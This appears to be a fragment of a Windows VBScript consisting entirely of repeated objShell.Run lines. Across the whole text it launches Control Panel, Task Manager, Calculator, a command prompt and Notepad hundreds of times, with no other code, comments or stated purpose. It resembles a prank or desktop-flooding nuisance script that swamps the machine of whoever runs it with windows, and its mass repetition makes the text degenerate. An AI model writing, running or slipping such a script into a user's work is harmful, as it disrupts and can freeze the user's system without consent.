objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False
